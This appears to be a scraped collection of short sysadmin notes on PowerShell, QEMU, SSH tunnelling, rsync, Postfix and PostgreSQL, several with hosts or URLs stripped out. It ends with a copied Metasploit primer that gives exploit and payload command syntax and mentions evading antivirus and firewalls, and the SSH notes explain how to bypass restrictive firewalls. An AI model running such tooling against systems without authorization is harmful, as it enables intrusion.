9: Manage other applications and services
Command: Import-Module

Example: Import-Module -Name NAME_OF_POWERSHELL_MODULE

One of PowerShell's greatest benefits is its flexibility when it comes to managing just about anything—from Windows-based computing systems to applications like Microsoft Exchange. Some applications and system-level services permit only a certain level of management via GUI. The rest is defaulted to PS, so Microsoft is clearly leveraging the technology significantly.

This is accomplished through the use of modules that contain the necessary codebase to run any number of additional cmdlets within PowerShell that target a specific service or application. Modules may be used only when needed by importing them, at which point they will extend the PS functionality to a specific service or app. Once your work is done, you can remove the module from the active session without closing it altogether.

10: Rename computers
Command: Rename-Computer

Example: Rename-Computer -NewName NEW_COMPUTER_NAME -LocalCredential COMPUTERNAME\USER -Restart

Depending on several factors, including the deployment system used, scripting experience level and security, and company policy, computers being renamed might not be done regularly (or perhaps it's a task performed quite often). Either way, the Rename cmdlet is extremely useful when working on one or multiple systems—workgroup or on a domain.

The cmdlet will rename a device and reboot it so that the changes can take effect. For those on a domain, the added benefit will be that if the Active Directory Schema supports it, the new computer will also result in a computer object rename within AD. The object will retain all its settings and domain joined status but will reflect the new name without any significant downtime to the user outside of a reboot

Auteur : Harlok

2018-09-27 19:19:15

Switch radeon GPU

Switch Radeon GPU: Restart GPUs and switch Polaris Compute Mode, Vega HBCC Memory and Large Pages
Updated on June 6th, 2018 to version 0.9.5

Switch Radeon GPU is a simple command line tool for restarting Radeon based GPUs. It can switch Polaris based GPUs (RX 470/480/570/580) from ‘Graphics Mode’ into ‘Compute Mode’. It also can toggle low level options of Radeon Vega GPUs like HBCC Memory and Large Pages support.

Switch Radeon GPU was developed as part of Cast XMR CryptoNight Miner but could be useful for handling Radeon GPUs for all sorts of workloads in OpenCL compute mode.

Make restarting your Radeon based GPU a breeze:

Switch Radeon GPU 0.9.5 for Windows (64 bit)
Restarts Radeon GPUs
Switch ‘Compute Mode’ on or off (only RX 470/RX 480/RX 570/RX 580)
Switch ‘HBCC Memory’ on or off (only Vega GPUs)
Switch ‘Large Pages’ on or off (only Vega GPUs)
Windows 8/8.1/10 64 bit
AMD Radeon RX Vega 56/64 GPU
or AMD Radeon Vega Frontier Edition GPU
or AMD Radeon RX 480/RX 580 GPU
or AMD Radeon RX 470/RX 570 GPU
Radeon Driver 17.1.1 or later for restarting GPUs
Radeon Driver 18.1.1 or later for switching modes
How To
switch-radeon-gpu has a command line interface:

switch-radeon-gpu [-G 0,..,N] [options] [restart|autorestart|fullrestart]

Executing switch-radeon-gpu without any arguments will list all installed Radeon GPUs and their status.

To select which GPU to operate on use the -G switch, e.g. for restarting the 2nd card use:

switch-radeon-gpu -G 1 restart

To select multiple GPUs use the -G switch and list comma separated the GPUs which should be used, e.g. for restarting the 1st and 3rd card use:

switch-radeon-gpu -G 0,2 restart

There are different restart modes:

restart         fast restart of the specified GPU; the AMD Radeon Settings app will sometimes not pick up the configuration changes and display the old state
autorestart     only restart the GPU if necessary due to a change in configuration
fullrestart     a more sustained restart of the GPU; the AMD Radeon Settings app will also restart

If no GPU is specified with the -G option, all available GPUs will be restarted!

Following options of the GPU can be switched:

--compute       =on switches the GPU into 'Compute Mode', =off back to 'Graphics Mode' (Polaris only)
--hbcc          switches HBCC Memory =on or =off (Vega only)
--largepages    switches large page support =on or =off (Vega only). Most useful on the Vega Frontier Edition to better utilize the available 16 GB of memory
For example switch all Polaris based GPUs to Compute Mode:

switch-radeon-gpu --compute=on autorestart

To turn the HBCC Memory option off for all Vega based GPUs:

switch-radeon-gpu --hbcc=off autorestart

To turn Large Pages on for the 1st GPU only:

switch-radeon-gpu -G 0 --largepages=on restart

For a complete list of configuration options run:

switch-radeon-gpu --help

Here's the software for Windows:

Auteur : Harlok

2019-10-03 14:35:10

VM (QEMU) screen resolution change

The default resolution in most XenCenter VMs is crap. Trying to work at 800x600 is like looking through a submarine porthole. Let's increase the VM's resolution:

sudo apt-get install xvfb xfonts-100dpi xfonts-75dpi xfstt
sudo nano /etc/default/grub

Press CTRL+W to search for the string below:


Set the line to the following. You can change the resolutions below to suit your preferred order. The first entry will be used by default. Don't forget you can set it pretty high and then just click the "scale" option in the console window of XenCenter.


Then add this underneath that line:


Save the config file with CTRL+X and select "Y" to confirm changes.

Update Grub:
sudo update-grub

Now reboot once the updates are all finished installing.

Auteur : Harlok

2019-04-16 22:16:15

qemu vnc

qemu-kvm [...] -vnc :5,password -monitor stdio

Starts the VM Guest graphical output on VNC display number 5 (usually port 5905). The password suboption initializes a simple password-based authentication method. There is no password set by default and you have to set one with the change vnc password command in QEMU monitor:

QEMU 0.12.5 monitor - type 'help' for more information
(qemu) change vnc password
Password: ****

Auteur : Harlok

2019-04-16 22:15:51

qemu: Set or force higher screen resolution

cvt 1024 768 60

this should output something like:

# 1024x768 59.92 Hz (CVT 0.79M3) hsync: 47.82 kHz; pclk: 63.50 MHz
Modeline "1024x768_60.00" 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync

Copy everything on the second line (the one that starts with 'Modeline') except for the word 'Modeline' itself. So you'd copy

"1024x768_60.00" 63.50 1024 1072 1176 1328 768 771 775 798

Then, type xrandr --newmode and paste after that. So it'd look like:

xrandr --newmode "1024x768_60.00" 63.50 1024 1072 1176 1328 768 771 775 798

If this fails, I will need to know how it fails, but it denotes some problem I am not aware of. It should work with any standard (VESA) resolution - no, 1366x768 is not a VESA standard and may fail. 1024x768 is a good one to try, as are 1280x1024, 1900x1200, 1920x1080, and many others. 1360x768 is compliant with the standard as well.

If it worked, now type xrandr without any arguments and you'll get a list of available displays. It may list multiple displays - you want to select one that says connected, such as

VGA1 connected 1600x900+1280+0 (normal left inverted right x axis y axis) 443mm x 249mm

Yours may be labeled differently, and will probably read 640x480 instead.

Take the first word (in my case VGA1) and copy it. Now type 'xrandr --addmode "output name" "the part in quotes from the modeline you calculated earlier, with quotes removed" '

such as:

xrandr --addmode VGA1 1024x768_60.00

If this succeeds, you can set the display mode from the UI (probably), or if that fails by typing

xrandr --output VGA1 --mode 1024x768_60.00

(substituting your values, of course)
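The whole sequence above can be scripted. The sed helper below is a sketch that extracts the `xrandr --newmode` arguments from cvt output; VGA1 and the 1024x768 mode are placeholders to substitute with your own values.

```shell
# Pull the arguments for `xrandr --newmode` out of `cvt` output.
modeline_args() {
  sed -n 's/^Modeline //p'
}

# With a running X session you would then do something like:
#   args=$(cvt 1024 768 60 | modeline_args)
#   eval xrandr --newmode $args              # eval keeps the quoted mode name as one word
#   eval xrandr --addmode VGA1 "${args%% *}" # first field is the quoted mode name
#   xrandr --output VGA1 --mode 1024x768_60.00
```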

To make these survive a reboot, you can either run the xrandr commands at startup (if you put them in, for example, your display manager's setup scripts, make sure they return zero; otherwise things changing between boots could cause your DM to hang or constantly restart!), or you can put something in xorg.conf or xorg.conf.d:

Section "Device"
    Identifier "Configured Video Device"
    Driver "vesa"
EndSection

Section "Monitor"
    Identifier "Configured Monitor"
    HorizSync 42.0 - 52.0
    VertRefresh 55.0 - 65.0
    Modeline "1024x768" 60.80 1024 1056 1128 1272 768 768 770 796
    Modeline "800x600" 38.21 800 832 976 1008 600 612 618 631
    Modeline "640x480" 24.11 640 672 760 792 480 490 495 50
EndSection

Section "Screen"
    Identifier "Default Screen"
    Monitor "Configured Monitor"
    Device "Configured Video Device"
    DefaultDepth 24
    SubSection "Display"
        Depth 24
        Modes "1024x768" "800x600" "640x480"
    EndSubSection
EndSection

Auteur : Harlok

2019-04-16 22:16:04

string to hex php

function strToHex($string){
    $hex = '';
    for ($i = 0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    }
    return $hex;
}

function hexToStr($hex){
    $string = '';
    for ($i = 0; $i < strlen($hex) - 1; $i += 2){
        $string .= chr(hexdec($hex[$i] . $hex[$i + 1]));
    }
    return $string;
}

function strhex($string) {
    $hexstr = unpack('H*', $string);
    return array_shift($hexstr);
}


The code below is what you need:

function strtohex($string){
    $string = str_split($string);
    foreach ($string as &$char){
        $char = "\x" . dechex(ord($char));
    }
    return implode('', $string);
}

print strtohex("[0-9A-Za-z\+/=]*");
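For comparison, a rough shell (bash) equivalent of the first two functions, using od for the forward direction and bash printf's \xHH escapes for the reverse:

```shell
# String -> hex: dump bytes as two-digit hex and strip whitespace.
str_to_hex() { printf '%s' "$1" | od -An -tx1 | tr -d ' \n'; }

# Hex -> string: consume two hex digits at a time.
hex_to_str() {
  local hex=$1 i
  for ((i = 0; i < ${#hex}; i += 2)); do
    printf "\x${hex:i:2}"
  done
}
```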

Auteur : Harlok

2020-06-28 20:34:11

Powershell command

get checksum:
Get-FileHash -Algorithm MD5

download a file:
method 1:
$url = ""
$output = "$PSScriptRoot\10meg.test"
$start_time = Get-Date

Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"

method 2:
$url = ""
$output = "$PSScriptRoot\10meg.test"
$start_time = Get-Date

$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
(New-Object System.Net.WebClient).DownloadFile($url, $output)

Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"

$client = new-object System.Net.WebClient
It works as well with GET queries.

If you need to specify credentials to download the file, add the following line in between:

$client.Credentials = Get-Credential

$computer = gc env:computername


$service = get-wmiObject -query "select * from SoftwareLicensingService" -computername $computer



Use the SC (service control) command, it gives you a lot more options than just start & stop.

SC is a command line program used for communicating with the
NT Service Controller and services.
sc [command] [service name] ...

The optional server parameter has the form "\\ServerName"
Further help on commands can be obtained by typing: "sc [command]"
query-----------Queries the status for a service, or
enumerates the status for types of services.
queryex---------Queries the extended status for a service, or
enumerates the status for types of services.
start-----------Starts a service.
pause-----------Sends a PAUSE control request to a service.
interrogate-----Sends an INTERROGATE control request to a service.
continue--------Sends a CONTINUE control request to a service.
stop------------Sends a STOP request to a service.
config----------Changes the configuration of a service (persistent).
description-----Changes the description of a service.
failure---------Changes the actions taken by a service upon failure.
qc--------------Queries the configuration information for a service.
qdescription----Queries the description for a service.
qfailure--------Queries the actions taken by a service upon failure.
delete----------Deletes a service (from the registry).
create----------Creates a service. (adds it to the registry).
control---------Sends a control to a service.
sdshow----------Displays a service's security descriptor.
sdset-----------Sets a service's security descriptor.
GetDisplayName--Gets the DisplayName for a service.
GetKeyName------Gets the ServiceKeyName for a service.
EnumDepend------Enumerates Service Dependencies.

The following commands don't require a service name:

Auteur : Harlok

2018-09-27 19:13:18

Unmount your root partition without rebooting

Ever wanted to unmount the root partition of your little Linux box? No? What for?! Well, I don't know, for example to perform operations on your root partition (resize it, change the filesystem, repair the fs). Except that normally you cannot unmount the root partition, since your OS lives on that partition.

Luckily, we live in a wonderful era where everyone has quite a few gigabytes of RAM, which makes the operation possible and even fairly simple. Let's go!

Stop everything that is running
To unmount your partition you will have to stop every process doing disk I/O (lsof will be your friend). This step can be done at the very last moment before the big jump, to minimize the impact on your services' uptime.

If you have enough RAM you can even manage not to stop anything, or just restart the processes, but that is a bit more touchy. Especially if you have data that may be modified while things are running.

Recreate your userland in RAM
The goal of the game is to build a root partition, but in RAM. First step: create a mount point with mkdir /ramroot and then mount a tmpfs on it with mount -t tmpfs none /ramroot .

From then on, everything you put in /ramroot will live in your RAM, not on your disk.

Two choices here: either your root partition fits in your RAM (the simplest case), or you don't have enough RAM and you will have to rebuild a root from scratch (I won't cover that, but basically you either take only the bare minimum from your rootfs, or grab a rootfs from the interwebz).
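A quick way to check which case you are in: compare the used space on / with the RAM currently available. A rough sketch (tmpfs overhead is ignored):

```shell
# Used space on the root filesystem, in KiB.
root_used_kb=$(df -k / | awk 'NR==2 {print $3}')
# RAM currently available, in KiB.
ram_avail_kb=$(awk '/^MemAvailable:/ {print $2}' /proc/meminfo)

if [ "$root_used_kb" -lt "$ram_avail_kb" ]; then
  echo "root fits in RAM"
else
  echo "not enough RAM, trim the rootfs first"
fi
```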

So: cp -ax /{bin,etc,sbin,lib32,lib64,lib} /ramroot , then to save some RAM, mkdir /ramroot/usr followed by cp -ax /usr/{bin,sbin,lib32,lib64} /ramroot/usr . There, we have the whole userspace!

All of it? No. The "special" mounts are still missing.

Well then, mkdir /ramroot/dev /ramroot/sys /ramroot/proc to create the mount points. Since these already exist on your hard disk, we will just bind them: mount --rbind /dev /ramroot/dev , then mount --rbind /sys /ramroot/sys and mount -t proc none /ramroot/proc , and everything is in place.

The big jump
So now you have a nice userspace available in your ramdisk. Time to migrate into it.

First, mkdir /ramroot/oldroot will receive our hard disk. And now the miracle command.

pivot_root /ramroot /ramroot/oldroot

And there you go: your root is now your ramdisk. You can umount /dev/sda2 and admire your hard work.

You can now do whatever you wanted to do. Beautiful, isn't it? In the end it is devilishly simple and super effective.

Want to go back without rebooting? Easy: just mount /dev/sda2 /oldroot and finally pivot_root /oldroot /oldroot/ramroot , and poof, you are out of your ramdisk and back on your partition.

Auteur : lord

Auteur : Harlok

2019-04-16 21:54:09

Change your terminal's background color

How many times have you wondered whether you were in a remote ssh session or in a local terminal? It happened to me constantly. Well, it used to. I found a little trick that changes everything: changing a terminal's background on the fly!

And yes, there is an escape sequence that performs this little miracle, provided your terminal supports it (for example xterm and, very soon, alacritty). The magic sequence is \033]11;#rrggbb\007 . There you go.

How to use it? Easy! Edit your /etc/ssh/ssh_config and put

PermitLocalCommand yes
LocalCommand /bin/echo -e "\033]11;#440044\007"
and bam: on the next ssh connection a magnificent purple background will jump out at you. Beware though, this breaks scp. But how do you restore the background when you come back? There you have to be a bit clever, we will see in a moment. You can also set a different color per ssh destination, either on the client side by editing your ~/.ssh/config (a bit annoying since it stays local), or by editing the init script of the remote shell. Personally I add the famous echo to /etc/zsh/zshrc with different colors per machine. That way it works whatever the origin machine is.

To get the original color back you have to cheat a little. In my case I use zsh. In it I added a nice little feature that times every command I run and displays the duration in the prompt. For that I have a file /etc/zsh/prompt.zsh containing two functions: preexec(), which sets a timer variable, and precmd(), which reads the timer variable, computes the elapsed seconds and displays the result in the RPROMPT. Nothing exotic so far. So it is enough to add the /bin/echo to precmd() and the trick is done. Since that function runs after every command, when you exit an ssh session you get your desired color back.
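As a sketch, the sequence can be wrapped in a small helper and called from precmd(); the colors below are just examples:

```shell
# Emit the OSC 11 escape sequence that sets the terminal background color.
set_term_bg() { printf '\033]11;%s\007' "$1"; }

# e.g. in /etc/zsh/prompt.zsh:
#   precmd() { set_term_bg '#000000'; }   # restore a black background locally
#   set_term_bg '#440044'                 # purple, for a remote zshrc
```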

For now it is almost as effective as a molly-guard. We'll see whether I end up getting too used to it, though.
Auteur : lord

Auteur : Harlok

2019-04-03 10:52:20

Terminals to test

Because it is the funniest of them all, it deserves a little spot here: Cancer. Yep, the Cancer terminal. Subtle and joyful. It is written in Rust and rather simple. It supports sixel, which is quite fun but frankly a gadget. I haven't tested it beyond that.

One of my favourites is st. A very simple term. No config file: if you want to change a setting, you edit config.h and recompile. In the end that file is well enough laid out, and compilation is so fast, that it isn't really slower than editing a regular config file. I used it for a very long time. It is made by the good folks at Suckless, who are committed to building the least bloated tools possible with very few lines of code. It is fast and even supports truecolor. No scrollback though; it can bother you at first but you get used to it very well. I kept it for a few years without trouble.

But I discovered a newcomer, the surprising Alacritty. It is simple: no GUI, a small well-commented config file, few gimmicky features, and a bit hungrier than st. Written in Rust, its claim to fame is being the fastest. And well, it really is fast! All rendering is actually done in OpenGL, so feeding it dozens of lines becomes instantaneous. You can even play with libcaca in "high resolution" again (yeah, by picking a tiny font to get small enough pixels; it's rather fluid). It is very young and thus still a bit rough around the edges (small graphical glitches in very rare cases), but in return you can influence its development a bit. A small community has already formed. I think it has quite a future. In short, it's my new toy of the moment.

Auteur: lord

Auteur : Harlok

2019-04-03 10:54:21


A few tips for using the patch command properly.

The diff command
This command finds the differences between two files. It returns the line from the original file and the modified line. It will let us create the patch that we can then apply. There are several patch formats; the most widespread is the unified patch, because it is flexible to apply, tolerating some variation in the file being patched.

The patch command
The patch command takes the output of diff as input and applies the changes to the designated file. Having both the original version and the modified version in the patch avoids patching the wrong file, or even patching a file that is already up to date.

Example:
diff -aburN --exclude=CVS* repertoire/reference/ repertoire/modifie/ > patch.diff
This command creates a unified patch. What the options do:

-a : treat all files as text
-b : ignore differences in whitespace
-u : produce a unified patch
-r : recurse into subdirectories
-N : handle new files
--exclude=CVS : exclude files or directories from the comparison
The patch built this way contains the elements that let the patch command find the files to modify within the tree, then find the right lines, even if they have been slightly moved.

patch -p 1 < patch.diff
The -p N option adapts the patch's original directory hierarchy to the tree currently being processed.
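A tiny end-to-end run of the two commands (the file and directory names here are made up for the demo):

```shell
# Build two trees that differ by one line.
mkdir -p demo/reference demo/modifie
printf 'hello\nworld\n' > demo/reference/file.txt
printf 'hello\nthere\n' > demo/modifie/file.txt

# Create the unified patch (diff exits 1 when the trees differ).
diff -aburN demo/reference/ demo/modifie/ > patch.diff || true

# Apply it to a copy of the reference tree; -p2 strips "demo/reference/".
cp -r demo/reference demo/work
( cd demo/work && patch -p2 < ../../patch.diff )
```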

Auteur : Harlok

2019-04-03 10:55:40


For all the operations that follow, you must be logged in as the postgres user:

%> su - postgres
Dump a database
The pg_dump command prints the structure of the database nom_de_la_base, along with its data, on standard output.

By redirecting standard output to a file, we therefore make a copy of the database.

%> pg_dump -D {nom_de_la_base} > {nom_du_fichier.dump}
Recreate a database from a dump
If a database needs to be restored, or a new one built from an existing database, use a dump file.

First, drop the existing database if necessary:

%> dropdb {nom_de_la_base}
Second, recreate or create the database:

%> createdb {nom_de_la_base}
Third, import the dump file into the database:

%> psql -e {nom_de_la_base} < {nom_du_fichier.dump}
To import the dump, you can also do it while connected to the database (useful when the postmaster requires password authentication [1]) using the psql command:

nom_de_la_base=# \i {nom_du_fichier.dump}
The database is thus created and initialized with the structure and data declared in the dump file. Since it is a plain-text file, it is very easy to edit with an editor.

PS: In all cases, for this to work, the PostgreSQL database server must be running on the machine. Forgetting to start it is a common mistake.

[1] because in that case the standard-input redirection cannot be used

Auteur : Harlok

2019-04-03 10:55:04


The goal of this document is to explain SSH tunnels, that is, how to use SSH to carry various other protocols, which secures the communication (a kind of software VPN). If you want more detail on the different possibilities, this article by Buddhika Chamith will enlighten you: SSH Tunneling Explained.

When you connect to the Internet from a public place and that access point does not let you reach particular ports of a server (restrictive firewall rules), you can use an intermediate server on which you have a user account and which runs an ssh server. It is that server that will connect to the desired destination. This solution also encrypts the communication between the access point and the intermediate server.

To achieve this we will use an SSH tunnel. We therefore need access to port 22 of the intermediate server, but in 90% of cases firewalls let traffic out on that port.

The principle
We create an ssh connection between the client pc and the intermediate server. This connection (the tunnel, then) binds a port of the client pc to the intermediate server. The latter reads everything it receives through this connection and forwards it all to the destination server.

Warning: under Linux, you cannot bind the tunnel to a privileged local port unless you are root. So take a port above 2000.

I want to read my mail over imap. My imap server is queried on port 143 (the default IMAP port), but the firewall does not let connections out to port 143.

So I will establish an SSH tunnel between the pc I am using and a server on which I have ssh access, where I have a user account with the login moncompte. I will bind the tunnel to port 2000 of my client pc, as follows:

ssh -2NfC

This command does not log me into the intermediate server; it gives me my prompt back immediately thanks to the -f option combined with -N. The -2 option asks ssh to use protocol v2, and -C asks it to compress the tunnel.

All that remains is to point my mail client at port 2000 on localhost, and I can read my mail as if I were connected directly to the mail server.
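The full command was presumably of the following shape (the host names below are placeholders, since they are missing from the note above):

```shell
local_port=2000
imap_server=imap.example.org            # placeholder: the mail server
jump_host=moncompte@shell.example.org   # placeholder: the intermediate ssh server

# -L binds local_port on this pc to imap_server:143, going via jump_host.
tunnel_cmd="ssh -2NfC -L ${local_port}:${imap_server}:143 ${jump_host}"
echo "$tunnel_cmd"
```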

A security detail
When I create user accounts on my server just for port forwarding, I do not grant them login access to the server. To do that, in /etc/passwd I replace the account's shell with /sbin/nologin. The holder of that account can then create SSH tunnels but cannot log into the server.

Under Windows
Using Cygwin and the ssh client that ships with it, this works very well. Putty can also establish tunnels, for those allergic to the command line.

Some links on the subject
Remote Desktop and SSH tunneling,
X over SSH2,
Documentation on Putty in French, with a section on port forwarding
Back up with rsync
You can use ssh to back up a remote machine (handy to keep a copy of a web site while downloading only what changed since the last backup) with rsync:

rsync -v -u -a --rsh=ssh --stats /chemin/dossier/local

Auteur : Harlok

2019-04-16 22:03:45

Open the tunnel

Nothing could be simpler: open your command line and type:

~$ ssh -fC -D 8080

With this command you connect as the user 'tunnel' on the remote machine, and the tunnel is reachable locally on port 8080. To check that the tunnel is really there:

~$ netstat -apnt

(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0* LISTEN -
tcp 0 0* LISTEN 4464/ssh
Good news: SSH is indeed listening on port 8080.
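On distributions where netstat is no longer installed, ss from iproute2 performs the same check; a minimal sketch for port 8080:

```shell
# Show listening TCP sockets: keep the header plus anything bound to port 8080.
ss -ltn | awk 'NR==1 || $4 ~ /:8080$/'
```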

Checking our IP
Before using the proxy, let's check our public IP address. Once the browser is configured to use the proxy, it should be different and match the IP address of the SSH server we are using.

There are plenty of services for discovering your IP address.

Configuring Firefox to use the SOCKS proxy

In Firefox, open the "Edit > Preferences" menu, and in the dialog choose the "Advanced" tab, then "Network", and finally the "Settings" button:

Firefox Preferences

Choose the "Manual proxy configuration" option; this enables a series of input fields. In the "SOCKS Host" field, enter your loopback address (adapt to your configuration), and in the "Port" field enter "8080", the tunnel's listening port. Then make sure "SOCKS v5" is selected, like so:

Connection Settings

You might think you are done, but no: one last killer detail remains, proxying the DNS requests. By default Firefox does not send them through the SOCKS proxy. Other browsers reportedly do, but Firefox has to be forced. To do so, open (1) "about:config" (type "about:config" in the address bar), then search (2) for the entry "network.proxy.socks_remote_dns", which is "false" by default. Double-click (3) the corresponding line to switch the value to "true":

about:config - Mozilla Firefox

Go back to your favorite IP-discovery site, and voilà: it now shows the proxy's address.

All is for the best in the best of all possible worlds.

Note: there is more to life than Firefox. To launch Chromium in incognito mode and have it use the SOCKS proxy without DNS leaks, according to this page, do the following:

~$ chromium-browser --incognito --proxy-server="socks5://" --host-resolver-rules="MAP *"

Author: Harlok

2019-04-16 21:22:36

Postfix queue

How to: Purge, Flush or Delete Postfix Queue, or a Single Email
Written by Guillermo Garron
Date: 2012-04-25 14:53:30 +00:00

To flush or purge the postfix mail queue, just enter this command:

postqueue -f

But if you need to delete an individual email from the queue, you'll first need to see the queue. Traditionally you would use mailq; this time we'll use:

postqueue -p

And the output should show all messages in queue:

5642B4D8647* 1683500 Tue Jun 3 08:37:27

9359B4D82B1* 1635730 Tue Jun 3 08:36:53

The first column is the queue ID. If you only want to delete one of the messages, enter:

postsuper -d 5642B4D8647

That deletes only that one specific email from the queue.

If you want to delete all deferred mails, you can use:

postsuper -d ALL deferred
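A common follow-up is deleting every queued message from a single sender. The sketch below inlines sample postqueue -p output (addresses are hypothetical) so the ID-extraction filter can run without a live queue; on a real system the resulting IDs would be fed to postsuper -d - as root:

```shell
# Sample `postqueue -p` output, inlined for the demonstration.
sample='-Queue ID- --Size-- ----Arrival Time---- -Sender/Recipient-------
5642B4D8647*    1683500 Tue Jun  3 08:37:27  spammer@example.com
                                         victim@example.org

9359B4D82B1*    1635730 Tue Jun  3 08:36:53  friend@example.net
                                         victim@example.org'

# Print the queue IDs whose sender matches, stripping the status flags
# (* = message active, ! = message held) from the ID column.
ids=$(printf '%s\n' "$sample" \
  | awk -v s="spammer@example.com" '$7 == s { print $1 }' | tr -d '*!')
echo "$ids"   # → 5642B4D8647
# On a live system, as root:  printf '%s\n' "$ids" | postsuper -d -
```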

Author: Harlok

2018-08-02 09:09:11


rsync options source destination
-v : verbose
-r : copies data recursively (but does not preserve timestamps or permissions while transferring data)
-a : archive mode, archive mode allows copying files recursively and it also preserves symbolic links, file permissions, user & group ownerships and timestamps
-z : compress file data
-h : human-readable, output numbers in a human-readable format
-e : specify the remote shell to use (e.g. ssh)

rsync -zvh backup.tar /tmp/backups/
rsync -avzh /root/rpmpkgs /tmp/backups/
rsync -avz rpmpkgs/ root@
rsync -avzh root@ /tmp/myrpms
rsync -avzhe ssh root@ /tmp/
rsync -avzhe ssh backup.tar root@
Add a port :
rsync -avzhe "ssh -p1234" backup.tar root@

The --include and --exclude options let us specify which files or directories should be included in the sync and which should be left out of the transfer.

rsync -avzhe ssh --progress /home/rpmpkgs root@
rsync -avze ssh --include 'R*' --exclude '*' root@ /root/rpm
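To see the include/exclude interplay without a remote host, a local sketch (paths hypothetical): files matching 'R*' are copied, and everything else is filtered out by the trailing catch-all exclude:

```shell
mkdir -p /tmp/incl_demo/src /tmp/incl_demo/dst
touch /tmp/incl_demo/src/R1.rpm /tmp/incl_demo/src/other.txt
# Filter rules are evaluated in order: the 'R*' include wins before the '*' exclude.
rsync -av --include 'R*' --exclude '*' /tmp/incl_demo/src/ /tmp/incl_demo/dst/
ls /tmp/incl_demo/dst   # → R1.rpm
```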

We can use the '--delete' option to remove files from the destination that are no longer present in the source directory.

rsync -avz --delete root@ .

rsync --dry-run --remove-source-files -zvh backup.tar /tmp/backups/

Set Bandwidth Limit and Transfer File

rsync --bwlimit=100 -avzhe ssh /var/lib/rpm/ root@

Also, by default rsync syncs changed blocks and bytes only; if you explicitly want to sync whole files, use the '-W' option.

rsync -zvhW backup.tar /tmp/backups/backup.tar


Author: Harlok

2019-05-04 22:00:04

Terminal Emulator Keyboard Shortcuts

Split Terminal Horizontally – Ctrl+Shift+O
Split Terminal Vertically – Ctrl+Shift+E
Move Parent Dragbar Right – Ctrl+Shift+Right_Arrow_key
Move Parent Dragbar Left – Ctrl+Shift+Left_Arrow_key
Move Parent Dragbar Up – Ctrl+Shift+Up_Arrow_key
Move Parent Dragbar Down – Ctrl+Shift+Down_Arrow_key
Hide/Show Scrollbar – Ctrl+Shift+s
Search for a Keyword – Ctrl+Shift+f
Move to Next Terminal – Ctrl+Shift+N or Ctrl+Tab
Move to the Above Terminal – Alt+Up_Arrow_Key
Move to the Below Terminal – Alt+Down_Arrow_Key
Move to the Left Terminal – Alt+Left_Arrow_Key
Move to the Right Terminal – Alt+Right_Arrow_Key
Copy a text to clipboard – Ctrl+Shift+c
Paste a text from Clipboard – Ctrl+Shift+v
Close the Current Terminal – Ctrl+Shift+w
Quit the Terminator – Ctrl+Shift+q
Toggle Between Terminals – Ctrl+Shift+x
Open New Tab – Ctrl+Shift+t
Move to Next Tab – Ctrl+page_Down
Move to Previous Tab – Ctrl+Page_up
Increase Font size – Ctrl+(+)
Decrease Font Size – Ctrl+(-)
Reset Font Size to Original – Ctrl+0
Toggle Full Screen Mode – F11
Reset Terminal – Ctrl+Shift+R
Reset Terminal and Clear Window – Ctrl+Shift+G
Remove all the terminal grouping – Super+Shift+t
Group all Terminal into one – Super+g

Author: Harlok

2018-07-18 08:29:18

Metasploit Background & Installation

Metasploit was developed by HD Moore as an open source project in 2003. Originally written in Perl, Metasploit was completely rewritten in Ruby in 2007. In 2009, it was purchased by Rapid7, an IT security company that also produces the vulnerability scanner Nexpose.

Metasploit is now in version 4.9.3, which is included in our Kali Linux. It's also built into BackTrack. For those of you using some other version of Linux or Unix (including Mac OS), you can download Metasploit from Rapid7's website.

For those of you using Windows, you can also grab it from Rapid7, but I do not recommend running Metasploit in Windows. Although you can download and install it, some of the capabilities of this hacking framework do not translate over to the Windows operating system, and many of my hacks here on Null Byte will not work on the Windows platform.
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)

Metasploit now has multiple products, including Metasploit Pro (the full commercial version) and the Community edition that is built into Kali and remains free. We will focus all of our efforts on the Community edition, as I am well aware that most of you will not be buying the $30,000 Pro edition.
Ways to Use Metasploit

Metasploit can be accessed or used in multiple ways. The most common method, and the one I use, is the interactive Metasploit console. This is the one that is activated by typing msfconsole at the command line in Kali. There are several other methods as well.

First, you can use Metasploit from the command line, in msfcli mode. Although it appears, when we are in the console, that we are using the command line, we are actually inside an interactive console with special keywords and commands. From the msfcli, we ARE actually using a Linux command line.

We can get the help screen for msfcli by typing:

kali > msfcli -h

Now to execute an exploit from the msfcli, the syntax is simply (the angle-bracket placeholders were stripped from the original and are restored here):

kali > msfcli <exploit> payload=<payload> rhost=<target IP> lhost=<local IP> E

Where E is short for execute.

In my tutorial on creating payloads to evade AV software, we are using the msfencode and msfpayload command in the command line (msfcli) mode.

The drawback to using the msfcli is that it is not as well-supported as the msfconsole, and you are limited to a single shell, making some of the more complex exploits impossible.

If you want to use Metasploit with a GUI (graphical user interface), at least a couple of options are available. First, Raphael Mudge has developed the Armitage (presumably a reference to a primary character in the seminal cyberhacking science fiction work, Neuromancer—a must read for any hacker with a taste for science fiction).

To start Armitage in Kali, simply type:

kali > armitage

If Armitage fails to connect, try these alternative commands:

kali > service postgresql start
kali > service metasploit start
kali > service metasploit stop

Armitage is a GUI overlay on Metasploit that operates in a client/server architecture. You start Metasploit as a server and Armitage becomes the client, thereby giving you full access to Metasploit's features through a full-featured, though not completely intuitive, GUI. If you really need a GUI to feel comfortable, I don't want to discourage you from using Armitage, but mastering the command line is a necessity for any self-respecting hacker.

Metasploit has six different types of modules. These are:


Payloads are the code that we will leave behind on the hacked system. Some people call these listeners, rootkits, etc. In Metasploit, they are referred to as payloads. These payloads include command shells, Meterpreter, etc. The payloads can be staged, inline, NoNX (bypasses the No execute feature in some modern CPUs), PassiveX (bypasses restricted outbound firewall rules), and IPv6, among others.

Exploits are the shellcode that takes advantage of a vulnerability or flaw in the system. These are operating system specific and many times, service pack (SP) specific, service specific, port specific, and even application specific. They are classified by operating system, so a Windows exploit will not work in a Linux operating system and vice versa.

Post are modules that we can use post exploitation of the system.

Nops are short for No OPerationS. In x86 CPUs, it is usually indicated by the hex 0x90. It simply means "do nothing". This can be crucial in creating a buffer overflow. We can view the nops modules by using the show command.

msf > show nops

